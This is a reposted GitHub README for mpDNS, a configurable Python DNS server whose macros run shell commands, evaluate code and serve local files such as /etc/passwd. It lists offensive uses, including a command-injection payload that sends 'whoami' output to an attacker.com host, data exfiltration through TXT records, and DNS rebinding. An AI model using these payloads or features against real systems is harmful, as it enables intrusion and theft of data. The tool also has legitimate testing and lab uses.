mpDNS: a multi-purpose DNS server implemented in Python
Simple, configurable "clone and run" DNS server with several useful features.
Works with Python 2 and 3
names.db -> contains all custom records (see example)
Simple wildcards such as *.example.com
Catches unicode DNS requests
Custom actions, a.k.a. macros:
- {{shellexec::dig google.com +short}} -> execute a shell command and respond with its result
- {{eval::res = '1.1.1.%d' % random.randint(0,256)}} -> evaluate your Python code
- {{file::/etc/passwd}} -> respond with the contents of a local file
- {{resolve}} -> forward the DNS request to the local system DNS
- {{resolve::example.com}} -> resolve example.com instead of the original record
- {{echo}} -> respond with the peer address
- {{shellexec::echo %PEER% %QUERY%}} -> use variables
Supported query types: A, CNAME, TXT
Update names.db records without restart/reload: ./mpdns.py -e
Heavily based on https://github.com/circuits/circuits/blob/master/examples/dnsserver.py
Usage: ./mpdns.py
Edit names.db with ./mpdns.py -e, no restart needed
Offensive and defensive purposes:
1. You need a lightweight, simple DNS server solution for testing purposes (not production!)
2. Testing various blind injection vulnerabilities in web applications (e.g. /ping.php?ip=$(dig $(whoami).attacker.com))
3. Easily exfiltrate 65K of data in a single TXT query
4. DNS rebinding
5. Perform custom macro actions on specific queries (useful in malware analysis lab environments)
6. And more. It is highly customizable.
Installation
git clone https://github.com/nopernik/mpDNS
Limitations
1. Because a UDP datagram is limited to 65535 bytes, a DNS response is limited to about 65200 bytes. This applies to TXT records, which are split into 256-byte chunks until the response reaches the maximum allowed 65200b, so a TXT macro record {{file:localfile.txt}} is limited to 65200 bytes.
2. Nested wildcards such as test.*.example.com are not supported
3. A custom DNS server resolver is not supported in the {{resolve::example.com}} macro
4. TTL is always set to 0
Examples
names.db example:
# Empty configuration will result in empty but valid responses
#
# Unicode domain names are not supported but still can be catched by the server.
# for example мама-сервер-unicode.google.com will be catched but with SERVFAIL response

passwd.example.com    TXT    {{file::/etc/passwd}}    #comments are ignored
shellexec             TXT    {{shellexec::whoami}}
eval                  TXT    {{eval::import random; res = random.randint(1,500)}}
resolve1              A      {{resolve}}
resolve2              A      {{resolve::self}}    #same as previous
resolve3              A      {{resolve::example.com}}
blabla.com            A      5.5.5.5
*                     A      127.0.0.1
*.example.com         A      7.7.7.7
c1.example.com        CNAME  c2.example.com
c2.example.com        CNAME  c3.example.com
c3.example.com        CNAME  google.example.com
google.example.com    CNAME  google.com
test.example.com      A      8.8.8.8
google.com            A      {{resolve::self}}
notgoogle.com         A      {{resolve::google.com}}
Sample output using the example names.db:

Regular resolution from the DB: dig test.example.com @localhost
;; ANSWER SECTION:
test.example.com.    0    IN    A    8.8.8.8
mpDNS output:
- Request from 127.0.0.1:57698 -> test.example.com. -> 8.8.8.8 (A)

Recursive CNAME resolution: dig c1.example.com @localhost
;; QUESTION SECTION:
;c1.example.com.    IN    A

;; ANSWER SECTION:
c1.example.com.         0    IN    CNAME    c2.example.com.
c2.example.com.         0    IN    CNAME    c3.example.com.
c3.example.com.         0    IN    CNAME    google.example.com.
google.example.com.     0    IN    CNAME    google.com.
google.com.             0    IN    A        216.58.206.14
mpDNS output:
- Request from 127.0.0.1:44120 -> c1.example.com. -> c2.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c2.example.com -> c3.example.com (CNAME)
- Request from 127.0.0.1:44120 -> c3.example.com -> google.example.com (CNAME)
- Request from 127.0.0.1:44120 -> google.example.com -> google.com (CNAME)
- Request from 127.0.0.1:44120 -> google.com -> {{resolve::self}} (A)

Wildcard resolution: dig not-in-db.com @localhost
;; ANSWER SECTION:
not-in-db.com.    0    IN    A    127.0.0.1
mpDNS output:
- Request from 127.0.0.1:38528 -> not-in-db.com. -> 127.0.0.1 (A)

Wildcard subdomain resolution: dig wildcard.example.com @localhost
;; ANSWER SECTION:
wildcard.example.com.    0    IN    A    7.7.7.7
mpDNS output:
- Request from 127.0.0.1:39691 -> wildcard.example.com. -> 7.7.7.7 (A)

Forwarded request macro: dig google.com @localhost
;; ANSWER SECTION:
google.com.    0    IN    A    172.217.22.110
mpDNS output:
- Request from 127.0.0.1:53487 -> google.com. -> {{resolve::self}} (A)

Forwarded request macro with a custom domain: dig notgoogle.com @localhost
;; ANSWER SECTION:
notgoogle.com.    0    IN    A    172.217.22.110
mpDNS output:
- Request from 127.0.0.1:47797 -> notgoogle.com. -> {{resolve::google.com}} (A)

File contents macro via TXT query: dig txt passwd.example.com @localhost
;; ANSWER SECTION:
passwd.example.com.    0    IN    TXT    "root:x:0:0:root:/root:/bin/bash\010daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\010bin:x:2:2:bin:......stripped"
mpDNS output:
- Request from 127.0.0.1:38805 -> passwd.example.com. -> ['root:x:0:0:root...(2808)'] (TXT)

Custom Python code macro via TXT query: dig txt eval @localhost
;; ANSWER SECTION:
eval.    0    IN    TXT    "320"
mpDNS output:
- Request from 127.0.0.1:33821 -> eval. -> ['320'] (TXT)

Shell command macro via TXT query: dig txt shellexec @localhost
;; ANSWER SECTION:
shellexec.    0    IN    TXT    "root"
mpDNS output:
- Request from 127.0.0.1:50262 -> shellexec. -> ['root'] (TXT)
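The lookup order that the examples above exercise (exact record, then the `*.parent` wildcard, then the bare `*` catch-all, with CNAME chains followed to the final answer) as an added illustration that is not part of mpDNS; it only recognises macros and returns them as tokens instead of executing anything. Assumptions: names.db lines are whitespace-separated `name type value` triples, and a `*.parent` wildcard matches a single label only (the page states nested wildcards are unsupported).

```python
import re
# Constructed names.db excerpt in the format shown above (assumption:
# whitespace-separated "name type value" lines, "#" starts a comment).
NAMES_DB = """
# comments are ignored
blabla.com          A      5.5.5.5
*                   A      127.0.0.1
*.example.com       A      7.7.7.7
c1.example.com      CNAME  c2.example.com
c2.example.com      CNAME  google.example.com
google.example.com  CNAME  google.com
test.example.com    A      8.8.8.8
google.com          A      {{resolve::self}}
"""
MACRO_RE = re.compile(r"^\{\{(\w+)(?:::(.*))?\}\}$")

def parse_db(text):
    """Return (name, qtype, value) triples; blank lines and '#' comments are dropped."""
    records = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            name, qtype, value = line.split(None, 2)
            records.append((name.lower().rstrip("."), qtype.upper(), value))
    return records

def lookup(records, qname, qtype):
    """Exact name first, then '*.<parent>' (assumed to cover one label), then bare '*'."""
    qname = qname.lower().rstrip(".")
    parent = qname.split(".", 1)[1] if "." in qname else ""
    for pattern in (qname, "*." + parent, "*"):
        for name, t, value in records:
            if name == pattern and t == qtype:
                return value
    return None

def resolve(records, qname, qtype, max_hops=10):
    """Follow CNAME hops to the final answer; macros come back as tokens, never run."""
    chain = []
    for _ in range(max_hops):
        target = lookup(records, qname, "CNAME")
        if qtype == "CNAME" or target is None:
            break
        chain.append((qname.lower().rstrip("."), "CNAME", target))
        qname = target
    value = lookup(records, qname, qtype)
    if value is not None:
        m = MACRO_RE.match(value)
        chain.append((qname.lower().rstrip("."), qtype, ("MACRO",) + m.groups() if m else value))
    return chain
```

`resolve(parse_db(NAMES_DB), "c1.example.com", "A")` returns the three CNAME hops followed by the `{{resolve::self}}` macro token for google.com, mirroring the per-hop lines mpDNS prints.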
* Source: github, compiled by 周大濤; please credit FreeBuf.COM when reposting.